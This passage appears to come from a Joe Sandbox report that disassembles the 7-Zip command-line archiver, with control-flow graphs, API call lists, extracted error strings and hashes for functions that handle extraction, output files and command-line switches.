44901f-449022 2132->2139 2140 449029-449030 2132->2140 2135->2082 2142 449267-449288 free * 3 2136->2142 2143 44909e-4490a3 2136->2143 2139->2140 2140->2129 2140->2132 2142->2082 2144 4490a5-4490c9 call 455a44 call 43fe74 2143->2144 2145 4490cb-4490ee call 447eb0 2143->2145 2155 44910d-449141 call 447544 2144->2155 2150 4490f4-449108 call 448798 2145->2150 2151 44928a-4492ab free * 3 2145->2151 2150->2155 2151->2082 2158 449147-44914a 2155->2158 2159 4492ad-4492cc free * 3 2155->2159 2160 44914c-449154 2158->2160 2161 449159-449167 call 455a44 call 412350 2158->2161 2159->2082 2160->2161 2165 44916c-449177 2161->2165 2166 44918e 2165->2166 2167 449179-44918c call 4418a8 2165->2167 2168 449191-4491cb free * 3 call 441784 2166->2168 2167->2168 2168->2106
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressProc
                                • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                • API String ID: 190572456-3984264347
                                • Opcode ID: 5b5e39a2a957b3a1a0cc6a0261fd3ec0937b74eaee6952ee97da04c0b47041c8
                                • Instruction ID: 0b50d40484bf0200c9e1398aea2bcf31b8164620e4de11de8e092592918e11b3
                                • Opcode Fuzzy Hash: 5b5e39a2a957b3a1a0cc6a0261fd3ec0937b74eaee6952ee97da04c0b47041c8
                                • Instruction Fuzzy Hash: 58E15272259AC496DB20EB22E84079FB3A5F7C5B84F400517EA8E87B19DF7CC955CB08
                                Function 0042AC94 Relevance: 39.6, APIs: 22, Strings: 4, Instructions: 602COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0042A7E4: free.MSVCRT ref: 0042A987
                                • free.MSVCRT ref: 0042AD79
                                • free.MSVCRT ref: 0042ADFE
                                • free.MSVCRT ref: 0042AE8E
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AA50
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AA58
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AA8F
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AA97
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AAA5
                                • free.MSVCRT ref: 0042AEE8
                                • free.MSVCRT ref: 0042AF13
                                • free.MSVCRT ref: 0042AF2A
                                • free.MSVCRT ref: 0042AF5B
                                • free.MSVCRT ref: 0042AF9C
                                  • Part of subcall function 0042728C: free.MSVCRT ref: 004275ED
                                • free.MSVCRT ref: 0042B56F
                                Strings
                                • Cannot set length for output file, xrefs: 0042B389
                                • Cannot seek to begin of file, xrefs: 0042B3D8
                                • Cannot open output file, xrefs: 0042B19B
                                • Cannot create hard link, xrefs: 0042B0CC
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Cannot create hard link$Cannot open output file$Cannot seek to begin of file$Cannot set length for output file
                                • API String ID: 1294909896-1337951305
                                • Opcode ID: aa3669d20ec57e454436983b0db19a1aa14331c377f79012aa6f7e83b80124e7
                                • Instruction ID: 2641184b3cd2e4dff1fe49d3944e41f69cff72732fc0d07601fb00a7f7e0e7dc
                                • Opcode Fuzzy Hash: aa3669d20ec57e454436983b0db19a1aa14331c377f79012aa6f7e83b80124e7
                                • Instruction Fuzzy Hash: DC32E472308AD496CB14EF25F5902AE7720F785B84F844127EB9A47B15CF6CC8A6C349
                                Function 00423760 Relevance: 38.8, APIs: 14, Strings: 8, Instructions: 264COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2497 423760-4237a4 call 411648 2500 4237a6-4237c9 call 4386a8 _CxxThrowException 2497->2500 2501 4237ca-42381b _isatty * 3 2497->2501 2500->2501 2503 42382e 2501->2503 2504 42381d-423821 2501->2504 2507 423833-423864 2503->2507 2504->2503 2506 423823-423827 2504->2506 2506->2503 2508 423829-42382c 2506->2508 2509 423892-4238ae 2507->2509 2510 423866-42388d call 422c88 call 412ecc free 2507->2510 2508->2507 2511 4238b0-4238b4 2509->2511 2512 4238bc 2509->2512 2510->2509 2511->2512 2514 4238b6-4238ba 2511->2514 2515 4238c3-4238c7 2512->2515 2514->2512 2514->2515 2517 4238d0-4238da 2515->2517 2518 4238c9 2515->2518 2520 4238e8-4238f2 2517->2520 2521 4238dc-4238e2 2517->2521 2518->2517 2523 423900-42390a 2520->2523 2524 4238f4-4238fa 2520->2524 2521->2520 2525 423918-423922 2523->2525 2526 42390c-423912 2523->2526 2524->2523 2527 423924-423932 2525->2527 2528 423988-423992 2525->2528 2526->2525 2531 423940-423953 call 422e88 2527->2531 2532 423934-42393e 2527->2532 2529 423994-4239a7 2528->2529 2530 4239ab-4239c2 call 41bd0c * 2 2528->2530 2529->2530 2541 4239c7-4239d1 2530->2541 2537 423955-42397a call 4386a8 _CxxThrowException 2531->2537 2538 42397b-423982 2531->2538 2532->2528 2537->2538 2538->2528 2543 423a72-423a7c 2541->2543 2544 4239d7-4239f0 2541->2544 2545 423a82-423a90 2543->2545 2546 423b97-423ba1 2543->2546 2547 4239f2-4239f7 2544->2547 2548 4239f9-423a0c wcscmp 2544->2548 2545->2546 2551 423a96-423add call 412db8 call 412f28 call 4139f0 call 414750 2545->2551 2549 423a50-423a57 call 41bda4 2547->2549 2548->2549 2550 423a0e-423a21 call 422e88 2548->2550 2549->2543 2561 423a59-423a6c call 46d8c0 call 41bd0c 2549->2561 2558 423a23-423a48 call 4386a8 _CxxThrowException 2550->2558 2559 423a49 2550->2559 2573 423adf-423ae9 2551->2573 2574 423aec-423af1 2551->2574 2558->2559 2559->2549 2561->2543 2573->2574 2575 423af3-423b18 call 4386a8 _CxxThrowException 2574->2575 2576 423b19-423b48 call 411c80 call 4139f0 GetCurrentProcess SetProcessAffinityMask 2574->2576 2575->2576 2583 423b84-423b92 call 413920 free 2576->2583 2584 423b4a-423b7f GetLastError call 4139f0 call 416d34 call 4139ac free 2576->2584 2583->2546 2584->2583
                                APIs
                                Strings
                                • Unsupported switch postfix -bb, xrefs: 00423958
                                • : ERROR : , xrefs: 00423B52
                                • Unsupported switch postfix -stm, xrefs: 00423AF6
                                • SeCreateSymbolicLinkPrivilege, xrefs: 004239BB
                                • Unsupported switch postfix for -slp, xrefs: 00423A26
                                • Set process affinity mask: , xrefs: 00423AAE
                                • SeLockMemoryPrivilege, xrefs: 00423A60
                                • SeRestorePrivilege, xrefs: 004239AD
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                                • String ID: : ERROR : $SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                • API String ID: 1978914637-1912842784
                                • Opcode ID: e7f2b4835cd6f56cb91759103e716ae9380ec5db3458876911303f3e00291719
                                • Instruction ID: 962a4ccdc1210d561e36a3e0db8bc1f2aea4c8acf84196363b7e0669f585bddd
                                • Opcode Fuzzy Hash: e7f2b4835cd6f56cb91759103e716ae9380ec5db3458876911303f3e00291719
                                • Instruction Fuzzy Hash: 0DC149B330868499DB21DF26E48039D7B71F795B88F888166EB8D47725DB3CCA95C708
                                Function 004188EC Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 488COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2593 4188ec-418911 2594 418913-418917 2593->2594 2595 418919-41891e 2593->2595 2594->2595 2596 41896f-418979 call 41ac10 2594->2596 2597 418920-418925 2595->2597 2598 418927-41892f 2595->2598 2604 418a5f-418a6b call 41ae80 2596->2604 2605 41897f-4189b9 call 413730 call 41ad8c 2596->2605 2597->2596 2597->2598 2598->2596 2599 418931-418935 2598->2599 2599->2596 2601 418937-41896a call 413730 2599->2601 2610 419051-41905c 2601->2610 2612 418a71-418a78 2604->2612 2613 418ce8-418d1e call 41adac call 41abe4 2604->2613 2620 4189bb-4189bf 2605->2620 2621 418a1e-418a3a call 419fc4 2605->2621 2612->2613 2615 418a7e-418a9f call 4135b8 * 2 2612->2615 2630 418d24-418d2b 2613->2630 2631 418db9-418dbd 2613->2631 2638 418aa1-418aaa 2615->2638 2639 418aae-418ab3 2615->2639 2620->2621 2622 4189c1-418a0a call 41bc48 2620->2622 2634 418a3c 2621->2634 2635 418a3e-418a42 2621->2635 2622->2621 2637 418a0c-418a19 2622->2637 2630->2631 2636 418d31-418d40 call 4186c8 2630->2636 2643 418dc9-418dcd 2631->2643 2644 418dbf-418dc3 2631->2644 2640 418a4e-418a5a call 41960c 2634->2640 2641 418a44-418a49 2635->2641 2642 418a4c 2635->2642 2645 418ff5-419012 call 418318 2636->2645 2660 418d46-418d4f 2636->2660 2637->2610 2638->2639 2649 418ad3-418adf call 4139f0 2639->2649 2650 418ab5-418ad1 call 412a70 2639->2650 2640->2610 2641->2642 2642->2640 2646 418e36-418e40 call 41ad28 2643->2646 2647 418dcf-418de1 call 4186c8 2643->2647 2644->2643 2644->2645 2667 419041-419049 call 4182ec 2645->2667 2668 419014-419016 2645->2668 2646->2645 2669 418e46-418e50 2646->2669 2647->2645 2665 418de7-418df0 2647->2665 2664 418ae4-418af5 call 41ad8c 2649->2664 2650->2649 2650->2664 2660->2645 2666 418d55-418d88 call 413730 2660->2666 2677 418b44-418b56 call 4188ec 2664->2677 2678 418af7-418afa 2664->2678 2665->2645 2673 418df6-418e31 call 4182ec 2665->2673 2687 418d99-418db4 call 418770 call 4182ec 2666->2687 2688 418d8a-418d95 2666->2688 2679 41904e 2667->2679 2668->2667 2675 419018-419021 2668->2675 2669->2645 2676 418e56-418e60 call 41ab3c 2669->2676 2673->2610 2675->2667 2682 419023-41903f call 418770 call 4182ec 2675->2682 2676->2645 2698 418e66-418e73 call 418770 2676->2698 2694 418b5c-418ba3 call 4136a8 call 41354c call 418680 2677->2694 2702 418cd3-418ce3 free * 2 2677->2702 2684 418b08-418b36 2678->2684 2685 418afc-418aff 2678->2685 2679->2610 2682->2610 2693 418b38-418b42 call 413798 2684->2693 2684->2694 2685->2677 2692 418b01-418b06 2685->2692 2687->2610 2688->2687 2692->2677 2692->2684 2693->2694 2724 418bf5-418c20 free * 2 call 4182ec free 2694->2724 2725 418ba5-418bac 2694->2725 2710 418e75-418e91 call 413730 call 4182ec 2698->2710 2711 418e96-418eac call 4135b8 2698->2711 2702->2613 2710->2610 2722 418ebc-418ed7 2711->2722 2723 418eae-418eb8 call 4132b0 2711->2723 2728 418ee7-418f1c call 418318 2722->2728 2729 418ed9-418ee3 call 4132b0 2722->2729 2723->2722 2745 418cc2-418cce free 2724->2745 2731 418c25-418c5c SetLastError free * 2 call 4182ec free 2725->2731 2732 418bae-418bbf call 4128e8 2725->2732 2742 418f76-418f90 call 4186c8 2728->2742 2743 418f1e-418f3c wcscmp 2728->2743 2729->2728 2731->2745 2748 418bc5-418bf3 free call 41354c call 418680 2732->2748 2749 418c5e-418c65 2732->2749 2760 418f92-418f94 2742->2760 2761 418fa7-418ff3 call 413730 free call 4182ec 2742->2761 2746 418f6e 2743->2746 2747 418f3e-418f69 call 413730 free call 4182ec 2743->2747 2745->2610 2746->2742 2747->2610 2748->2724 2748->2725 2751 418c67-418c6c 2749->2751 2752 418c7b-418cc0 call 4139ac free * 2 call 4182ec free 2749->2752 2751->2752 2756 418c6e-418c77 2751->2756 2752->2745 2756->2752 2766 418f96-418f99 2760->2766 2767 418f9b-418fa5 free 2760->2767 2761->2610 2766->2761 2766->2767 2767->2645
                                APIs
                                  • Part of subcall function 004135B8: memmove.MSVCRT ref: 004135F0
                                • free.MSVCRT ref: 00418BCA
                                • free.MSVCRT ref: 00418BFA
                                • free.MSVCRT ref: 00418C05
                                • free.MSVCRT ref: 00418C1A
                                • free.MSVCRT ref: 00418CC7
                                  • Part of subcall function 004188EC: SetLastError.KERNEL32 ref: 00418C2A
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418C36
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418C41
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418C56
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418CD8
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418CE3
                                • free.MSVCRT ref: 00418C9A
                                • free.MSVCRT ref: 00418CA5
                                • free.MSVCRT ref: 00418CBA
                                • wcscmp.MSVCRT ref: 00418F34
                                • free.MSVCRT ref: 00418F54
                                • free.MSVCRT ref: 00418FA0
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • free.MSVCRT ref: 00418FDE
                                  • Part of subcall function 004182EC: FindClose.KERNELBASE ref: 004182FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$CloseErrorFindLastwcscmp
                                • String ID: :$:$DATA$\
                                • API String ID: 2757989841-1004618218
                                • Opcode ID: 05d3dba421aa1cb443c381141900eb5aba611e133aa90caca10377ea91583d8e
                                • Instruction ID: c845cbb13752e57a59e9137e8ad3387a3eaaf93a16a11e3db970e01400aa8f66
                                • Opcode Fuzzy Hash: 05d3dba421aa1cb443c381141900eb5aba611e133aa90caca10377ea91583d8e
                                • Instruction Fuzzy Hash: 5412D07210968096CB20EF26D4902AEB761F795744F80821FE79E87B65DF3CC4E6CB09
                                Function 00463C48 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 226COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2775 463c48-463c79 2776 463f9f 2775->2776 2777 463c7f 2775->2777 2779 463fa1-463fb4 2776->2779 2778 463c82-463cbe fputs call 462ad0 2777->2778 2782 463d12-463d16 2778->2782 2783 463cc0-463cc4 2778->2783 2784 463d21-463d2c 2782->2784 2785 463d18-463d1f 2782->2785 2786 463cc6-463cde fputs call 4124c4 2783->2786 2787 463ce0-463d0d call 4135b8 call 462d88 free 2783->2787 2788 463d30-463d58 call 462ad0 call 462e04 2784->2788 2785->2788 2786->2782 2787->2782 2799 463d8d-463da4 call 462cf0 2788->2799 2800 463d5a-463d88 fputs * 2 call 4125dc call 4124c4 2788->2800 2799->2779 2805 463daa-463db1 2799->2805 2800->2799 2807 463de6-463df6 2805->2807 2808 463db3-463de1 fputs * 2 call 41263c call 4124c4 2805->2808 2807->2779 2813 463dfc-463e02 2807->2813 2808->2807 2814 463e04-463e33 2813->2814 2815 463e69-463e73 2813->2815 2821 463f70 2814->2821 2822 463e39-463e49 call 462cf0 2814->2822 2816 463f54-463f68 2815->2816 2817 463e79-463e9a fputs 2815->2817 2816->2778 2818 463f6e 2816->2818 2817->2816 2824 463ea0-463eb3 2817->2824 2818->2776 2823 463f74-463f81 SysFreeString 2821->2823 2827 463e4e-463e50 2822->2827 2823->2779 2824->2816 2826 463eb9-463eea 2824->2826 2831 463f83 2826->2831 2832 463ef0-463f19 2826->2832 2828 463e56-463e67 SysFreeString 2827->2828 2829 463f72 2827->2829 2828->2814 2828->2815 2829->2823 2833 463f90-463f9d SysFreeString 2831->2833 2835 463f85-463f8f call 41be6c 2832->2835 2836 463f1b-463f4e call 462b78 call 41be6c SysFreeString 2832->2836 2833->2779 2835->2833 2836->2816 2836->2826
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$FreeString$fputcfree
                                • String ID: = $--$----$Path$PvG$Type$Warning: The archive is open with offset
                                • API String ID: 2701146716-2323763876
                                • Opcode ID: f43c4620d8d8a3c28b4e7786d7024dc72ec64756f072e8b8e9cbd45f56a53a34
                                • Instruction ID: 361afc234045d79ae50dea2bdaeb93c8cba25ada6b6846ce091f3393e41c87c3
                                • Opcode Fuzzy Hash: f43c4620d8d8a3c28b4e7786d7024dc72ec64756f072e8b8e9cbd45f56a53a34
                                • Instruction Fuzzy Hash: 29915676218A8592DB14DF26E9447AA7321F785BC9F405027EF4E43B28EF3CC95AC709
                                Function 0042728C Relevance: 31.8, APIs: 17, Strings: 4, Instructions: 276COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2843 42728c-4272df call 418290 call 41354c call 4188ec 2850 4272e5-4272e9 2843->2850 2851 4275f9-427605 call 41ae80 2843->2851 2853 4272f0-4272f3 2850->2853 2854 4272eb 2850->2854 2860 4276a3-4276b3 free 2851->2860 2861 42760b-427616 2851->2861 2857 42744b-42744f 2853->2857 2858 4272f9-4273ac call 413b28 call 425f40 call 4134d0 free 2853->2858 2856 4275e5-4275f4 free 2854->2856 2859 4276b5-4276c2 2856->2859 2863 427490-427494 2857->2863 2864 427451-42745b call 41e70c 2857->2864 2914 4273c1-4273ca 2858->2914 2915 4273ae-4273bc free 2858->2915 2860->2859 2861->2860 2865 42761c-42762e call 4136a8 2861->2865 2867 427562-42756e 2863->2867 2868 42749a-4274b4 call 4136a8 call 41e70c 2863->2868 2881 427484-42748b 2864->2881 2882 42745d-427471 call 426e00 2864->2882 2885 427630-427639 2865->2885 2886 42763d-42766f call 418290 call 41354c call 4188ec 2865->2886 2873 427570-42757a call 417088 2867->2873 2874 42759c-4275a6 call 419164 2867->2874 2901 4274b6-4274cc call 426e00 2868->2901 2902 4274f5-427504 call 417130 2868->2902 2873->2860 2895 427580-427594 call 426e88 2873->2895 2874->2860 2891 4275ac-4275b6 call 417474 2874->2891 2881->2860 2897 427473-427475 2882->2897 2898 42747a-42747f 2882->2898 2885->2886 2934 427671-42767b 2886->2934 2935 42768b-42769e free * 2 2886->2935 2891->2860 2912 4275bc-4275c5 GetLastError 2891->2912 2909 427596-427598 2895->2909 2910 42759a 2895->2910 2897->2856 2898->2856 2921 4274e0-4274f0 free 2901->2921 2922 4274ce-4274db free 2901->2922 2917 427553-42755d free 2902->2917 2918 427506-42752a call 4195e0 call 426f80 2902->2918 2909->2856 2910->2856 2912->2860 2919 4275cb-4275df call 426e88 2912->2919 2923 427441-427446 free 2914->2923 2924 4273cc-4273ce 2914->2924 2915->2856 2917->2860 2948 42753e-42754e free 2918->2948 2949 42752c-427539 free 2918->2949 2919->2856 2940 4275e1-4275e3 2919->2940 2921->2856 2922->2856 2923->2857 2925 4273d0-4273d2 2924->2925 2926 42743a 2924->2926 2930 4273d4-4273d6 2925->2930 2931 42742a-427435 free 2925->2931 2926->2923 2937 427413-427425 free 2930->2937 2938 4273d8-4273da 2930->2938 2931->2856 2934->2935 2936 42767d-427685 call 416fcc 2934->2936 2935->2860 2945 42768a 2936->2945 2937->2856 2942 42740a-427411 2938->2942 2943 4273dc-4273de 2938->2943 2940->2856 2942->2923 2946 4273e0-4273f0 free 2943->2946 2947 4273f5-427405 free 2943->2947 2945->2935 2946->2856 2947->2856 2948->2856 2949->2856
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Cannot create file with auto name$Cannot delete output file$Cannot delete output folder$Cannot rename existing file
                                • API String ID: 1294909896-3443351061
                                • Opcode ID: 7015291d19cea9615b8cd146ea9ca66bc542f039213e21b23768e11c5d6aef03
                                • Instruction ID: 6684b840346afc15de165b281c28b7ca4cb80a56bbf09ae61e5682da71cc1474
                                • Opcode Fuzzy Hash: 7015291d19cea9615b8cd146ea9ca66bc542f039213e21b23768e11c5d6aef03
                                • Instruction Fuzzy Hash: 87A1B67234C6A592DB20EF26F4903EEA361F785784F900117EB9A87B15DE6CC896C70D
                                Function 0046A6E3 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 149COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2950 46a6e3-46a6ef 2951 46a736-46a73e 2950->2951 2952 46a6f1-46a6f9 2950->2952 2954 46a790-46a798 2951->2954 2955 46a740-46a742 2951->2955 2952->2951 2953 46a6fb-46a72f call 4124c4 fputs call 41263c call 4124c4 2952->2953 2953->2951 2957 46a79b-46a7a9 2954->2957 2958 46a744-46a773 call 4124c4 fputs call 41263c call 4124c4 2955->2958 2959 46a778-46a781 2955->2959 2961 46a7dc-46a7f8 free 2957->2961 2962 46a7ab 2957->2962 2958->2959 2959->2957 2966 46a7fa 2961->2966 2967 46a82b-46a850 free 2961->2967 2965 46a7af-46a7c5 2962->2965 2970 46a7d7-46a7da 2965->2970 2971 46a7c7-46a7d2 free * 2 2965->2971 2972 46a7fe-46a814 2966->2972 2978 46a852-46a859 2967->2978 2979 46a860-46a863 2967->2979 2970->2961 2970->2965 2971->2970 2976 46a826-46a829 2972->2976 2977 46a816-46a821 free * 2 2972->2977 2976->2967 2976->2972 2977->2976 2978->2979 2981 46a85b 2978->2981 2983 46a865-46a881 _CxxThrowException 2979->2983 2984 46a882-46a89d free 2979->2984 2986 46a85b call 466550 2981->2986 2983->2984 2987 46a89f 2984->2987 2988 46a8bd-46a8dc free call 448b60 call 46738c 2984->2988 2986->2979 2989 46a8a3-46a8bb free 2987->2989 2993 46a8e1-46a918 free call 411874 call 467ec8 2988->2993 2989->2988 2989->2989 2998 46a94a-46a96b free 2993->2998 2999 46a91a 2993->2999 3000 46a91e-46a934 2999->3000 3001 46a946-46a948 3000->3001 3002 46a936-46a941 free * 2 3000->3002 3001->2998 3001->3000 3002->3001
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$fputs$ExceptionThrowfputc
                                • String ID: Errors: $Warnings:
                                • API String ID: 437615013-2345102087
                                • Opcode ID: c3d0abce408dde42c17494abdae3fdcf64b4e9ff092c9feb317e4479279828f3
                                • Instruction ID: d2619c8fc8aa3dd064bfee33bdddf7396604d9b0ef05558c260312edd0ac4d04
                                • Opcode Fuzzy Hash: c3d0abce408dde42c17494abdae3fdcf64b4e9ff092c9feb317e4479279828f3
                                • Instruction Fuzzy Hash: B751D762344AC542DB30FB32E5903AE6360F781B98F444127DE5D57B59DF2CC8A68B0A
                                Function 00449944 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 306libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3003 449944-44997a 3004 44997c 3003->3004 3005 4499a9-4499b7 3003->3005 3006 449980-449992 3004->3006 3007 4499ef-449a11 3005->3007 3008 4499b9 3005->3008 3012 4499a4-4499a7 3006->3012 3013 449994-44999f call 441784 free 3006->3013 3010 449c87-449cce call 4470ac call 413504 call 4493b8 free 3007->3010 3011 449a17 3007->3011 3009 4499bd-4499cf 3008->3009 3014 4499d1-4499e5 free * 3 3009->3014 3015 4499ea-4499ed 3009->3015 3031 449cd5-449cdd 3010->3031 3032 449cd0 3010->3032 3016 449a1e-449ad4 call 41354c call 4138a8 call 41354c * 2 3011->3016 3012->3005 3012->3006 3013->3012 3014->3015 3015->3007 3015->3009 3041 449ad6-449adb call 4138a8 3016->3041 3042 449ae0-449ae7 3016->3042 3034 449cef-449d20 call 413504 call 4496f8 free 3031->3034 3035 449cdf-449cea call 413730 3031->3035 3033 449de7-449e06 free 3032->3033 3051 449d27-449d44 call 413504 call 4496f8 3034->3051 3052 449d22 3034->3052 3035->3034 3041->3042 3043 449af6-449b55 call 448580 free * 2 3042->3043 3044 449ae9-449af1 call 4138a8 3042->3044 3053 449b57-449b6c call 448798 3043->3053 3054 449b71-449b75 3043->3054 3044->3043 3065 449d49-449d58 free 3051->3065 3052->3033 3057 449c23-449c41 call 455a44 call 412350 3053->3057 3054->3057 3058 449b7b-449b98 call 455a44 call 412350 3054->3058 3076 449c55 3057->3076 3077 449c43-449c53 call 4418a8 3057->3077 3079 449ba3 3058->3079 3080 449b9a-449ba1 3058->3080 3068 449d5f-449d69 3065->3068 3069 449d5a 3065->3069 3071 449d71-449d74 3068->3071 3072 449d6b-449d6f 3068->3072 3069->3033 3075 449d83-449d87 3071->3075 3078 449d76-449d7d 3071->3078 3072->3075 3084 449dd0-449de4 call 447d18 3075->3084 3085 449d89-449d8f 3075->3085 3086 449c58-449c81 call 441784 3076->3086 3077->3086 3078->3075 3083 449d7f 3078->3083 3081 449ba6-449bd1 3079->3081 3080->3081 3087 449c03-449c06 3081->3087 3088 449bd3-449bd9 3081->3088 3083->3075 3084->3033 3085->3084 3090 449d91 3085->3090 3086->3010 3086->3016 3098 449c20 3087->3098 3099 449c08-449c19 memmove 3087->3099 3094 449be7-449bf2 3088->3094 3095 449bdb-449be0 free 3088->3095 3096 449d94-449db3 GetProcAddress 3090->3096 3100 449bf4-449bff call 412350 3094->3100 3101 449c1b-449c1e 3094->3101 3095->3094 3102 449db5-449dbd 3096->3102 3103 449dbf-449dc8 3096->3103 3098->3057 3099->3057 3100->3087 3101->3057 3102->3103 3108 449dcc-449dce 3102->3108 3103->3096 3105 449dca 3103->3105 3105->3084 3108->3033
                                APIs
                                • free.MSVCRT ref: 0044999F
                                • free.MSVCRT ref: 004499D5
                                • free.MSVCRT ref: 004499DD
                                • free.MSVCRT ref: 004499E5
                                • free.MSVCRT ref: 00449B16
                                • free.MSVCRT ref: 00449B21
                                • free.MSVCRT ref: 00449BDB
                                • memmove.MSVCRT(?), ref: 00449C11
                                • free.MSVCRT ref: 00449CC6
                                • free.MSVCRT ref: 00449DEC
